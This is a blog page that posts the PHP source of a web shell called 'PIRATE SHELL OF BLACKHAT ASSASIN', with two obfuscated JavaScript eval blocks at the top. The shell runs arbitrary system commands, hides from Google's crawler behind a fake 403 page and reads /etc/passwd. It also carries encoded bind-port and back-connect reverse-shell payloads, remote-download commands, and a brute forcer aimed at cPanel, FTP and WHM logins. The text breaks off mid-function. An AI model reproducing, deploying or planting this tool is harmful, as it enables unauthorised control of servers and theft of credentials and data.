blackhatassasin

Just another WordPress.com site

blalala

eval(function(p,a,c,k,e,r){e=function(c){return(c35?String.fromCharCode(c+29):c.toString(36))};if(!”.replace(/^/,String)){while(c–)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return’\\w+’};c=1};while(c–)if(k[c])p=p.replace(new RegExp(‘\\b’+e(c)+’\\b’,’g’),k[c]);return p}(‘c(d.e(f.g(6,1,0,7,3,4,8,h,i,j,k,l,m,n,o,p,q,5,2,1,9,0,9,2,r,a,s,t,1,2,3,u,0,4,v,0,2,5,a,w,x,y,z,b,b,5,A,B,6,C,1,0,7,3,4,8)));’,39,39,’116|115|111|108|101|112|60|121|62|105|58|48|eval|document|write|String|fromCharCode|46|76|74|109|71|119|67|87|69|123|110|97|98|117|59|45|49|55|54|120|125|47′.split(‘|’),0,{}))

eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\\b’+e(c)+’\\b’,’g’),k[c])}}return p}(‘i(f.j(h.g(b,1,0,9,6,4,7,c,d,e,k,3,2,1,8,0,8,2,t,a,r,s,1,2,6,l,0,4,q,0,2,3,a,p,5,5,5,3,m,n,b,o,1,0,9,6,4,7)));’,30,30,’116|115|111|112|101|57|108|62|105|121|58|60|46|100|99|document|fromCharCode|String|eval|write|123|117|120|125|47|45|59|97|98|110′.split(‘|’),0,{}))

<?php
/*********************************************************************************************************/
$auth_pass = ""; //password crypted with md5, default is 'Newbie3viLc063s'
/*********************************************************************************************************/
$color = "#00ff00";
$default_action = 'FilesMan';
@define('SELF_PATH', __FILE__);

/*********************************************************************************************************/
# Avoid google's crawler
if( strpos($_SERVER['HTTP_USER_AGENT'],'Google') !== false ) { header('HTTP/1.0 404 Not Found'); exit; }
/*********************************************************************************************************/

@session_start();
@error_reporting(0);
@ini_set('error_log',NULL);
@ini_set('log_errors',0);
@ini_set('max_execution_time',0);
@set_time_limit(0);
@set_magic_quotes_runtime(0);
@define('VERSION', 'v.2012');
@define('TITLE', '::PIRATE SHELL OF BLACKHAT ASSASIN ::');

/*********************************************************************************************************/

if( get_magic_quotes_gpc() )
{
function stripslashes_array($array) { return is_array($array) ? array_map('stripslashes_array', $array) : stripslashes($array); }
$_POST = stripslashes_array($_POST);
}

function logout()
{
unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
$page = $host='http://&#039;.$_SERVER['SERVER_NAME'].'/'.$_SERVER['PHP_SELF'];
echo 'The System Is Going To Down For LogOut Administrator Pages!!’;
?>
window.location.href = ”;
<?php
exit(0);
}

$disablefunc = @ini_get("disable_functions");

function showdisablefunctions() {
if ($disablefunc=@ini_get("disable_functions")){ return "“.$disablefunc.”“; }
else { return “NONE“; }
}

function ex($cfe) {
$res = ”;
if (!empty($cfe)) {
if(function_exists(‘exec’)) {
@exec($cfe,$res);
$res = join(“\n”,$res);
} elseif(function_exists(‘shell_exec’)) {
$res = @shell_exec($cfe);
} elseif(function_exists(‘system’)) {
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
} elseif(function_exists(‘passthru’)) {
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
} elseif(@is_resource($f = @popen($cfe,”r”))) {
$res = “”;
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
} else { $res = “Ex() Disabled!”; }
}
return $res;
}

function showstat($stat) {
if ($stat==”on”) { return “ON“; }
else { return “OFF“; }
}
function testperl() {
if (ex(‘perl -h’)) { return showstat(“on”); }
else { return showstat(“off”); }
}
function testfetch() {
if(ex(‘fetch –help’)) { return showstat(“on”); }
else { return showstat(“off”); }
}
function testwget() {
if (ex(‘wget –help’)) { return showstat(“on”); }
else { return showstat(“off”); }
}
function testoracle() {
if (function_exists(‘ocilogon’)) { return showstat(“on”); }
else { return showstat(“off”); }
}
function testpostgresql() {
if (function_exists(‘pg_connect’)) { return showstat(“on”); }
else { return showstat(“off”); }
}
function testmssql() {
if (function_exists(‘mssql_connect’)) { return showstat(“on”); }
else { return showstat(“off”); }
}
function testcurl() {
if (function_exists(‘curl_version’)) { return showstat(“on”); }
else { return showstat(“off”); }
}
function testmysql() {
if (function_exists(‘mysql_connect’)) { return showstat(“on”); }
else { return showstat(“off”); }
}

$quotes = get_magic_quotes_gpc();
if ($quotes == “1” or $quotes == “on”)
{
$quot = “ON“;
}
else
{
$quot = “OFF“;
}

function printLogin()
{
?>

input { margin:0;background-color:#fff;border:1px solid #fff; }

403 Forbidden

Forbidden

You don’t have permission to access this file on this server .


Apache/2.2.8 at Port 80

<?php
exit;
}

if( !isset( $_SESSION[md5($_SERVER['HTTP_HOST'])] ))
{
if( empty( $auth_pass ) || ( isset( $_POST['x'] ) && ( md5($_POST['x']) == $auth_pass ) ) )
{ $_SESSION[md5($_SERVER['HTTP_HOST'])] = true; }
else
{ printLogin(); }
}

if(isset($_GET['dl']) && ($_GET['dl'] != ""))
{
$file = $_GET['dl'];
$filez = @file_get_contents($file);
header("Content-type: application/octet-stream");
header("Content-length: ".strlen($filez));
header("Content-disposition: attachment;
filename=\"".basename($file)."\";");
echo $filez;
exit;
}

elseif(isset($_GET['dlgzip']) && ($_GET['dlgzip'] != ""))
{
$file = $_GET['dlgzip'];
$filez = gzencode(@file_get_contents($file));
header("Content-Type:application/x-gzip\n");
header("Content-length: ".strlen($filez));
header("Content-disposition: attachment; filename=\"".basename($file).".gz\";");
echo $filez; exit;
}

if(isset($_GET['img']))
{
@ob_clean();
$d = magicboom($_GET['y']);
$f = $_GET['img'];
$inf = @getimagesize($d.$f);
$ext = explode($f,".");
$ext = $ext[count($ext)-1];
@header("Content-type: ".$inf["mime"]);
@header("Cache-control: public");
@header("Expires: ".date("r",mktime(0,0,0,1,1,2030)));
@header("Cache-control: max-age=".(60*60*24*7));
@readfile($d.$f);
exit;
}
$ver = VERSION;

$DISP_SERVER_SOFTWARE = getenv("SERVER_SOFTWARE");

if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") $safemode = TRUE;
else $safemode = FALSE;
$system = @php_uname();

if(strtolower(substr($system,0,3)) == "win") $win = TRUE;
else $win = FALSE;

if(isset($_GET['y']))
{ if(@is_dir($_GET['view'])){ $pwd = $_GET['view']; @chdir($pwd); } else{ $pwd = $_GET['y']; @chdir($pwd); } }

if(!$win)
{ if(!$user = rapih(exe("whoami"))) $user = ""; if(!$id = rapih(exe("id"))) $id = ""; $prompt = $user." \$ "; $pwd = @getcwd().DIRECTORY_SEPARATOR; }
else
{
$user = @get_current_user();
$id = $user;
$prompt = $user." >";
$pwd = realpath(".")."\\";
$v = explode("\\",$d);
$v = $v[0];
foreach (range("A","Z") as $letter)
{
$bool = @is_dir($letter.":\\");
if ($bool)
{
$letters .= "[ “;
if ($letter.”:” != $v) {$letters .= $letter;}
else {$letters .= ““.$letter.”“;}
$letters .= ” ]
“;
}
}
}

if(function_exists(“posix_getpwuid”) && function_exists(“posix_getgrgid”)) $posix = TRUE;
else $posix = FALSE;

$bytes = disk_free_space(“.”);
$si_prefix = array( ‘B’, ‘KB’, ‘MB’, ‘GB’, ‘TB’, ‘EB’, ‘ZB’, ‘YB’ );
$base = 1024;
$class = min((int)log($bytes , $base) , count($si_prefix) – 1);
$totalspace_bytes = disk_total_space(“.”);
$totalspace_si_prefixs = array( ‘B’, ‘KB’, ‘MB’, ‘GB’, ‘TB’, ‘EB’, ‘ZB’, ‘YB’ );
$totalspace_bases = 1024;
$totalspace_class = min((int)log($totalspace_bytes , $totalspace_bases) , count($totalspace_si_prefixs) – 1);
$totalspace_show = sprintf(‘%1.2f’ , $totalspace_bytes / pow($totalspace_bases,$totalspace_class)) . ‘ ‘ . $totalspace_si_prefixs[$totalspace_class] . ”;
$freespace_show = sprintf(‘%1.2f’ , $bytes / pow($base,$class)) . ‘ ‘ . $si_prefix[$class] . ”;
$server_ip = @gethostbyname($_SERVER[“HTTP_HOST”]);
$my_ip = $_SERVER[‘REMOTE_ADDR’];
$bindport = “55555”;
$bindport_pass = “Newbie3viLc063s”;
$pwds = explode(DIRECTORY_SEPARATOR,$pwd);
$pwdurl = “”;
for($i = 0 ; $i < sizeof($pwds)-1 ; $i++)
{
$pathz = "";
for($j = 0 ; $j <= $i ; $j++)
{
$pathz .= $pwds[$j].DIRECTORY_SEPARATOR;
}
$pwdurl .= "“.$pwds[$i].” “.DIRECTORY_SEPARATOR.” “;
}

if(isset($_POST[‘rename’])){ $old = $_POST[‘oldname’]; $new = $_POST[‘newname’]; @rename($pwd.$old,$pwd.$new); $file = $pwd.$new; }
$buff = $DISP_SERVER_SOFTWARE.”
“;
$buff .= $system.”
“;
if($id != “”) $buff .= $id.”
“;
$buff .= “Server IP : “.”$server_ip“.” | “.”Your IP : “.”$my_ip“.”
“;
$buff .= “Total HDD Space : “.”$totalspace_show“.” | “.”Free HDD Space : “.”$freespace_show“.”
“;
$buff .= “Magic Quotes:$quot”.”
“;
$buff .= “Disabled Functions: “.showdisablefunctions().”
“;
$buff .= “MySQL: “.testmysql().” MSSQL: “.testmssql().” Oracle: “.testoracle().” MSSQL: “.testmssql().” PostgreSQL: “.testpostgresql().” cURL: “.testcurl().” WGet: “.testwget().” Fetch: “.testfetch().” Perl: “.testperl().”
“;
if($safemode) $buff .= “safemode ON
“;
else $buff .= “safemode OFF
“;
$buff .= $letters.” > “.$pwdurl;

function rapih($text){ return trim(str_replace(“
“,””,$text)); }

function magicboom($text){ if (!get_magic_quotes_gpc()) { return $text; } return stripslashes($text); }

function showdir($pwd,$prompt)
{
$fname = array();
$dname = array();
if(function_exists(“posix_getpwuid”) && function_exists(“posix_getgrgid”)) $posix = TRUE;
else $posix = FALSE;
$user = “????:????”;
if($dh = opendir($pwd))
{
while($file = readdir($dh))
{
if(is_dir($file))
{ $dname[] = $file; }
elseif(is_file($file))
{ $fname[] = $file; }
}
closedir($dh);
}
sort($fname);
sort($dname);
$path = @explode(DIRECTORY_SEPARATOR,$pwd);
$tree = @sizeof($path);
$parent = “”;
$buff = ”

CMD@$prompt
view file/folder

“;

if($tree > 2) for($i=0;$i<$tree-2;$i++) $parent .= $path[$i].DIRECTORY_SEPARATOR;
else $parent = $pwd;
foreach($dname as $folder)
{
if($folder == ".")
{
if(!$win && $posix)
{
$name=@posix_getpwuid(@fileowner($folder));
$group=@posix_getgrgid(@filegroup($folder));
$owner = $name['name']." : “.$group[‘name’];
}
else { $owner = $user; }
$buff .= “

“;
}
elseif($folder == “..”)
{
if(!$win && $posix)
{
$name=@posix_getpwuid(@fileowner($folder));
$group=@posix_getgrgid(@filegroup($folder));
$owner = $name[‘name’].” : “.$group[‘name’];
}
else { $owner = $user; }
$buff .= “

“;
}
else
{
if(!$win && $posix)
{
$name=@posix_getpwuid(@fileowner($folder));
$group=@posix_getgrgid(@filegroup($folder));
$owner = $name[‘name’].” : “.$group[‘name’];
}
else { $owner = $user; }
$buff .= “

“;
}
}
foreach($fname as $file)
{
$full = $pwd.$file;
if(!$win && $posix)
{
$name=@posix_getpwuid(@fileowner($file));
$group=@posix_getgrgid(@filegroup($file));
$owner = $name[‘name’].” : “.$group[‘name’];
}
else { $owner = $user; }
$buff .= “

“;
}
$buff .= “

name size owner:group perms modified actions
$folder “.$owner.” “.get_perms($pwd).” “.date(“d-M-Y H:i”,@filemtime($pwd)).”
newfile
| newfolder

$folder “.$owner.” “.get_perms($parent).” “.date(“d-M-Y H:i”,@filemtime($parent)).”
newfile
| newfolder

[ $folder ]

DIR “.$owner.” “.get_perms($pwd.$folder).” “.date(“d-M-Y H:i”,@filemtime($folder)).” rename
| delete
$file

“.ukuran($full).” “.$owner.” “.get_perms($full).” “.date(“d-M-Y H:i”,@filemtime($full)).” edit
| rename
| delete
| download (gz)

“; return $buff;
}

function ukuran($file)
{
if($size = @filesize($file))
{
if($size <= 1024) return $size;
else
{
if($size “.$namafile); break;
case ‘wfread’ : ambil($wurl,$namafile);break;
case ‘wfetch’ : exe(which(‘fetch’).” -o “.$namafile.” -p “.$url);break;
case ‘wlinks’ : exe(which(‘links’).” -source “.$url.” > “.$namafile);break;
case ‘wget’ : exe(which(‘GET’).” “.$url.” > “.$namafile);break;
case ‘wcurl’ : exe(which(‘curl’).” “.$url.” -o “.$namafile);break;
default: break; }
return $namafile;
}

function get_perms($file)
{
if($mode=@fileperms($file))
{
$perms=”;
$perms .= ($mode & 00400) ? ‘r’ : ‘-‘;
$perms .= ($mode & 00200) ? ‘w’ : ‘-‘;
$perms .= ($mode & 00100) ? ‘x’ : ‘-‘;
$perms .= ($mode & 00040) ? ‘r’ : ‘-‘;
$perms .= ($mode & 00020) ? ‘w’ : ‘-‘;
$perms .= ($mode & 00010) ? ‘x’ : ‘-‘;
$perms .= ($mode & 00004) ? ‘r’ : ‘-‘;
$perms .= ($mode & 00002) ? ‘w’ : ‘-‘;
$perms .= ($mode & 00001) ? ‘x’ : ‘-‘;
return $perms;
}
else return “??????????”;
}

function clearspace($text){ return str_replace(” “,”_”,$text); }

$port_bind_bd_c=”bVNhb9owEP2OxH+4phI4NINAN00aYxJaW6maxqbSLxNDKDiXxiLYkW3KGOp/3zlOpo7xIY793jvf +fl8KSQvdinCR2NTofr5p3br8hWmhXw6BQ9mYA8lmjO4UXyD9oSQaAV9AyFPCNRa+pRCWtgmQrJE P/GIhufQg249brd4nmjo9RxBqyNAuwWOdvmyNAKJ+ywlBirhepctruOlW9MJdtzrkjTVKyFB41ZZ dKTIWKb0hoUwmUAcwtFt6+m+EXKVJVtRHGAC07vV/ez2cfwvXSpticytkoYlVglX/fNiuAzDE6VL 3TfVrw4o2P1senPzsJrOfoRjl9cfhWjvIatzRvNvn7+s5o8Pt9OvURzWZV94dQgleag0C3wQVKug Uq2FTFnjDzvxAXphx9cXQfxr6PcthLEo/8a8q8B9LgpkQ7oOgKMbvNeThHMsbSOO69IA0l05YpXk HDT8HxrV0F4LizUWfE+M2SudfgiiYbONxiStebrgyIjfqDJG07AWiAzYBc9LivU3MVpGFV2x1J4W tyxAnivYY8HVFsEqWF+/f7sBk2NRQKcDA/JtsE5MDm9EUG+MhcFqkpX0HmxGbqbkdBTMldaHRsUL ZeoDeOSFBvpefCfXhflOpgTkvJ+jtKiR7vLohYKCqS2ZmMRj4Z5gQZfSiMbi6iqkdnHarEEXYuk6 uPtTdumsr0HC4q5rrzNifV7sC3ZWUmq+LVlVa5OfQjTanZYQO+Uf”;
$port_bind_bd_pl=”ZZJhT8IwEIa/k/AfjklgS2aA+BFmJDB1cW5kHSZGzTK2Qxpmu2wlYoD/bruBIfitd33uvXuvvWr1 NmXRW1DWy7HImo02ebRd19Kq1CIuV3BNtWGzQZeg342DhxcYwcCAHeCWCn1gDOEgi1yHhLYXzfwg tNqKeut/yKJNiUB4skYhg3ZecMETnlmfKKrz4ofFX6h3RZJ3DUmUFaoTszO7jxzPDs0O8SdPEQkD e/xs/gkYsN9DShG0ScwEJAXGAqGufmdq2hKFCnmu1IjvRkpH6hE/Cuw5scfTaWAOVE9pM5WMouM0 LSLK9HM3puMpNhp7r8ZFW54jg5wXx5YZLQUyKXVzwdUXZ+T3imYoV9ds7JqNOElQTjnxPc8kRrVo vaW3c5paS16sjZo6qTEuQKU1UO/RSnFJGaagcFVbjUTCqeOZ2qijNLWzrD8PTe32X9oOgvM0bjGB +hecfOQFlT4UcLSkmI1ceY3VrpKMy9dWUCVCBfTlQX6Owy8=”;

$back_connect=”fZFRS8MwFIXfB/sPWSw2hUrnqyPC0CpD3KStvqh0XRpcsE1KkoKF/XiTtCIV6tu55+Z89yY5W0St ktGB8aihsprPWkVBKsgn1av5zCN1iQGsOv4Fbak6pWmNgU/JUQC4b3lRU3BR7OFqcFhptMOpo28j S2whVulCflCNvXVy//K6fLdWI+SPcekMVpSlxIxTnRdacDSEAnA6gZJRBGMphbwC3uKNw8AhXEKZ ja3ImclYagh61n9JKbTAhu7EobN3Qb4mjW/byr0BSnc3D3EWgqe7fLO1whp5miXx+tHMcNHpGURw Tskvpd92+rxoKEdpdrvZhgBen/exUWf3nE214iT52+r/Cw3/5jaqhKL9iFFpuKPawILVNw==”; $back_connect_c=”XVHbagIxEH0X/IdhhZLUWF1f1YKIBelFqfZJliUm2W7obiJJLLWl/94k29rWhyEzc+Z2TjpSserA BYyt41JfldftVuc3d7R9q9mLcGeAEk5660sVAakc1FQqFBxqnhkBVlIDl95/3Wa43fpotyCABR95 zzpzYA7CaMq5yaUCK1VAYpup7XaYZpPE1NArIBmBRzgVtVYoJQMcR/jV3vKC1rI6wgSmN/niYb75 i+21cR4pnVYWUaclivcMM/xvRDjhysbHVwde0W+K0wzH9bt3YfRPingClVCnim7a/ZuJC0JTwf3A RkD0fR+B9XJ2m683j/PpPYHFavW43CzzzWyFIfbIAhBiWinBHCo4AXSmFlxiuPB3E0/gXejiHMcY jwcYguIAe2GMNijZ9jL4GYqTSB9AvEmHGjk/m19h1CGvPoHIY5A1Oh2tE3XIe1bxKw77YTyt6T2F 6f9wGEPxJliFkv5Oqr4tE5LYEnoyIfDwdHcXK1ilrfAdUbPPLw==”;
?>

function tukar(lama,baru)
{
document.getElementById(lama).style.display = ‘none’;
document.getElementById(baru).style.display = ‘block’;
}

AKUSTYLE { display:none; }
body { background:#0F0E0E; }
A:link {COLOR: #2BA8EC; TEXT-DECORATION: none }
A:visited {COLOR: #2BA8EC; TEXT-DECORATION: none }
A:hover {text-shadow: 0pt 0pt 0.3em cyan, 0pt 0pt 0.3em cyan; color: #ff9900; TEXT-DECORATION: none }
A:active {color: Red; TEXT-DECORATION: none }
textarea {BORDER-RIGHT: #3e3e3e 1px solid; BORDER-TOP: #3e3e3e 1px solid; BORDER-LEFT: #3e3e3e 1px solid; BORDER-BOTTOM: #3e3e3e 1px solid; BACKGROUND-COLOR: #1b1b1b; font: Fixedsys bold; color: #aaa; }
* { font-size:11px; font-family:Tahoma,Verdana,Arial; color:#FFFFFF; }
#menu { background:#111111; margin:2px 2px 2px 2px; }
#menu a { padding:4px 18px; margin:0; background:#222222; text-decoration:none; letter-spacing:2px; }
#menu a:hover { background:#744F4F; border-bottom:1px solid #333333; border-top:1px solid #333333; }
.tabnet { margin:15px auto 0 auto; border: 1px solid #333333; }
.main { width:100%; }
.gaya { color: #4C83AF; }
.your_ip { color: #FF4719; }
.inputz { background:#796767; border:0; padding:2px; border-bottom:1px solid #222222; border-top:1px solid #222222; }
.inputzbut { background:#111111; color:#666666; margin:0 4px; border:1px solid #444444; }
.inputz:hover,
.inputzbut:hover { border-bottom:1px solid #4532F6; border-top:1px solid #D4CECE; color:#D4CECE; }
.output { margin:auto; border:1px solid #FF0000; width:100%; height:400px; background:#000000; padding:0 2px; }
.cmdbox { width:100%; }
.head_info { padding: 0 4px; }
.b1 { font-size:30px; padding:0; color:#FF0000; }
.b2 { font-size:30px; padding:0; color: #FF9966; }
.b_tbl { text-align:center; margin:0 4px 0 0; padding:0 4px 0 0; border-right:1px solid #333333; }
.phpinfo table { width:100%; padding:0 0 0 0; }
.phpinfo td { background:#111111; color:#cccccc; padding:6px 8px;; }
.phpinfo th, th { background:#191919; border-bottom:1px solid #333333; font-weight:normal; }
.phpinfo h2,
.phpinfo h2 a { text-align:center; font-size:16px; padding:0; margin:30px 0 0 0; background:#222222; padding:4px 0; }
.explore { width:100%; }
.explore a { text-decoration:none; }
.explore td { border-bottom:1px solid #DB2B2B; padding:0 8px; line-height:24px; }
.explore th { padding:3px 8px; font-weight:normal; }
.explore th:hover,
.phpinfo th:hover { border-bottom:1px solid #4C83AF; }
.explore tr:hover { background:#744F4F; }
.viewfile { background:#EDECEB; color:#000000; margin:4px 2px; padding:8px; }
.sembunyi { display:none; padding:0;margin:0; }


ASSASIN CREW
blackhat assasin


<form action="?y=&x=php” method=”post”>

<?php
}
elseif(isset($_GET['x']) && ($_GET['x'] == 'mysql'))
{
if(isset($_GET['sqlhost']) && isset($_GET['sqluser']) && isset($_GET['sqlpass']) && isset($_GET['sqlport']))
{
$sqlhost = $_GET['sqlhost']; $sqluser = $_GET['sqluser']; $sqlpass = $_GET['sqlpass']; $sqlport = $_GET['sqlport'];
if($con = @mysql_connect($sqlhost.":".$sqlport,$sqluser,$sqlpass))
{
$msg .= "

“;
$msg .= “

Connected to “.$sqluser.”@“.$sqlhost.”:”.$sqlport;
$msg .= ”  ->  [ databases ]“;
if(isset($_GET[‘db’]))
$msg .= ”  ->  
“.htmlspecialchars($_GET[‘db’]).”“;
if(isset($_GET[‘table’]))
$msg .= ”  ->
  
“.htmlspecialchars($_GET[‘table’]).”“;
$msg .= “

version : “.mysql_get_server_info($con).” proto “.mysql_get_proto_info($con).”

“;
$msg .= “

“;
echo $msg;
if(isset($_GET[‘db’]) && (!isset($_GET[‘table’])) && (!isset($_GET[‘sqlquery’])))
{
$db = $_GET[‘db’];
$query = “DROP TABLE IF EXISTS Newbie3viLc063s0_table;
\nCREATE TABLE `Newbie3viLc063s0_table` ( `file` LONGBLOB NOT NULL );
\nLOAD DATA INFILE \”/etc/passwd\”\nINTO TABLE Z3r0Z3r0_table;SELECT * FROM Newbie3viLc063s0_table;
\nDROP TABLE IF EXISTS Newbie3viLc063s0_table;”;
$msg = “

$query

“;
$tables = array();
$msg .= “

“;
$hasil = @mysql_list_tables($db,$con);
while(list($table) = @mysql_fetch_row($hasil))
{ @array_push($tables,$table); }
@sort($tables);
foreach($tables as $table)
{
$msg .= “

“;
}
$msg .= “

available tables on “.$db.”
$table

“;
}
elseif(isset($_GET[‘table’]) && (!isset($_GET[‘sqlquery’])))
{
$db = $_GET[‘db’];
$table = $_GET[‘table’];
$query = “SELECT * FROM “.$db.”.”.$table.” LIMIT 0,100;”;
$msgq = “

“.$query.”

“;
$columns = array();
$msg = “

“;
$hasil = @mysql_query(“SHOW FIELDS FROM “.$db.”.”.$table);
while(list($column) = @mysql_fetch_row($hasil))
{
$msg .= “

“; $kolum = $column;
}
$msg .= “

“;
$hasil = @mysql_query(“SELECT count(*) FROM “.$db.”.”.$table);
list($total) = mysql_fetch_row($hasil);
if(isset($_GET[‘z’])) $page = (int) $_GET[‘z’];
else $page = 1;
$pagenum = 100;
$totpage = ceil($total / $pagenum);
$start = (($page – 1) * $pagenum);
$hasil = @mysql_query(“SELECT * FROM “.$db.”.”.$table.” LIMIT “.$start.”,”.$pagenum);
while($datas = @mysql_fetch_assoc($hasil))
{
$msg .= “

“;
foreach($datas as $data){ if(trim($data) == “”) $data = ” “; $msg .= “

“; }
$msg .= “

“;
}
$msg .= “

$column
$data

“;
$head = “

Page “;
for($i = 1;$i <= $totpage;$i++)
{
$head .= "”.$i.””;
if($i == $_GET[‘z’]) $head .= “”.$i.””;
}
$head .= “

“;
$msg = $msgq.$head.$msg;
}
elseif(isset($_GET[‘submitquery’]) && ($_GET[‘sqlquery’] != “”))
{
$db = $_GET[‘db’];
$query = magicboom($_GET[‘sqlquery’]);
$msg = “

“.$query.”

“;
@mysql_select_db($db);
$querys = explode(“;”,$query);
foreach($querys as $query)
{
if(trim($query) != “”)
{
$hasil = mysql_query($query);
if($hasil)
{
$msg .= “

“.$query.”;   
[ ok ]

“;
$msg .= “

“;
for($i=0;$i<@mysql_num_fields($hasil);$i++) $msg .= "

“;
$msg .= “

“;
for($i=0;$i<@mysql_num_rows($hasil);$i++)
{
$rows=@mysql_fetch_array($hasil);
$msg .= "

“;
for($j=0;$j<@mysql_num_fields($hasil);$j++)
{
if($rows[$j] == "") $dataz = " ";
else $dataz = $rows[$j];
$msg .= "

“;
}
$msg .= “

“;
}
$msg .= “

“.htmlspecialchars(@mysql_field_name($hasil,$i)).”
“.$dataz.”

“;
}
else
$msg .= “

“.$query.”;   [ error ]

“;
}
}
}
else
{
$query = “SHOW PROCESSLIST;\n
SHOW VARIABLES;\n
SHOW STATUS;”;
$msg = “

“.$query.”

“;
$dbs = array();
$msg .= “

“;
$hasil = @mysql_list_dbs($con);
while(list($db) = @mysql_fetch_row($hasil)){ @array_push($dbs,$db); }
@sort($dbs);
foreach($dbs as $db)
{
$msg .= “

“;
}
$msg .= “

available databases
$db

“;
}
@mysql_close($con);
}
else $msg = “

cant connect to mysql server

“;
echo $msg;
}
else
{
?>

<input type="hidden" name="y" value="” />

Connect to mySQL server
  Host
  Username
  Password
  Port  

<form action="?y=&x=mail” method=”post”>

Hey admin, please patch your site ๐Ÿ™‚
   mail to
 
  from
   subject
 
    

<form action="?y=&x=brute” method=”post”>
<?php
//bruteforce
@ini_set('memory_limit', 999999999999);
$connect_timeout=5;
@set_time_limit(0);
$pokeng = $_REQUEST['submit'];
$hn = $_REQUEST['users'];
$crew = $_REQUEST['passwords'];
$pasti = $_REQUEST['sasaran'];
$manualtarget = $_REQUEST['target'];
$bisa = $_REQUEST['option'];
if($pasti == ''){
$pasti = 'localhost';
}
if($manualtarget == ''){
$manualtarget = 'http://localhost:2082&#039;;
}

function get_users()
{
$users = array();
$rows=file('/etc/passwd');
if(!$rows) return 0;
foreach ($rows as $string)
{
$user = @explode(":",$string);
if(substr($string,0,1)!='#') array_push($users,$user[0]);
}
return $users;
}

if(!$users=get_users()) { echo "“.$lang[$language.’_text96′].”“; }
else
{
print ”

Target ! :

User

Pass

“;
foreach($users as $user) { echo $user.”\n”; }
print”
$crew

Sila pilih : Manual Target Brute :

cPanel
ftp
whm ==>

“;
}
?>
<?php

function manual_check($anjink,$asu,$babi,$lonte){
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "$anjink");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
curl_setopt($ch, CURLOPT_USERPWD, "$asu:$babi");
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $lonte);
curl_setopt($ch, CURLOPT_FAILONERROR, 1);
$data = curl_exec($ch);
if ( curl_errno($ch) == 28 ) { print " Failed! : NEXT TARGET!“; exit;}
elseif ( curl_errno($ch) == 0 ){
print “[ Newbie3viLc063s0@email ]# Completed , Username = $asu Password = $babi
“;
}
curl_close($ch);
}

function ftp_check($link,$user,$pswd,$timeout){
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, “ftp://$link”);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
curl_setopt($ch, CURLOPT_FTPLISTONLY, 1);
curl_setopt($ch, CURLOPT_USERPWD, “$user:$pswd”);
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
curl_setopt($ch, CURLOPT_FAILONERROR, 1);
$data = curl_exec($ch);
if ( curl_errno($ch) == 28 ) { print “ Failed! : NEXT TARGET!“; exit; }
elseif ( curl_errno($ch) == 0 ){
print “serangan selesai , username = $user dan passwordnya = $pswd
“;
}
curl_close($ch);
}

function cpanel_check($anjink,$asu,$babi,$lonte){
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, “http://$anjink:2082&#8221;);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
curl_setopt($ch, CURLOPT_USERPWD, “$asu:$babi”);
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $lonte);
curl_setopt($ch, CURLOPT_FAILONERROR, 1);
$data = curl_exec($ch);
if ( curl_errno($ch) == 28 ) { print “ Failed! : NEXT TARGET!“; exit;}
elseif ( curl_errno($ch) == 0 ){
print “[ Newbie3viLc063s@email ]# Completed, Username = $asu Password = $babi
“;
}
curl_close($ch);
}

function whm_check($anjink,$asu,$babi,$lonte){
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, “http://$anjink:2086&#8221;);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
curl_setopt($ch, CURLOPT_USERPWD, “$asu:$babi”);
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $lonte);
curl_setopt($ch, CURLOPT_FAILONERROR, 1);
$data = curl_exec($ch);
if ( curl_errno($ch) == 28 ) { print “ Failed! : NEXT TARGET!“; exit;}
elseif ( curl_errno($ch) == 0 )
{
print “[ ” . TITLE . ” ]# Selesai , Username = $asu Password = $babi
“;
}
curl_close($ch);
}

if(isset($pokeng) && !empty($pokeng))
{
$userlist = explode (“\n” , $hn );
$passlist = explode (“\n” , $crew );
print “[ ” . TITLE . ” ]# ATTACK…!!!
“;
foreach ($userlist as $asu)
{
$_user = trim($asu);
foreach ($passlist as $babi )
{
$_pass = trim($babi);
if ($bisa == “manual”)
{ manual_check($manualtarget,$_user,$_pass,$lonte); }
if($bisa == “ftp”)
{ ftp_check($pasti,$_user,$_pass,$lonte); }
if ($bisa == “cpanel”)
{ cpanel_check($pasti,$_user,$_pass,$lonte); }
if ($bisa == “whm”)
{ whm_check($pasti,$_user,$_pass,$lonte); }
}
}
}
}

//bruteforce

elseif(isset($_GET[‘x’]) && ($_GET[‘x’] == ‘readable’))
{
?>
<form action="?y=&x=readable” method=”post”>
<?php

//radable public_html
echo 'Newbie3viLc063s Cpanel Finder’;
($sm = ini_get(‘safe_mode’) == 0) ? $sm = ‘off’: die(‘Error: safe_mode = on‘);
set_time_limit(0);
###################
@$passwd = fopen(‘/etc/passwd’,’r’);
if (!$passwd) { die(‘[-] Error : coudn`t read /etc/passwd‘); }
$pub = array();
$users = array();
$conf = array();
$i = 0;
while(!feof($passwd))
{
$str = fgets($passwd);
if ($i > 35)
{
$pos = strpos($str,’:’);
$username = substr($str,0,$pos);
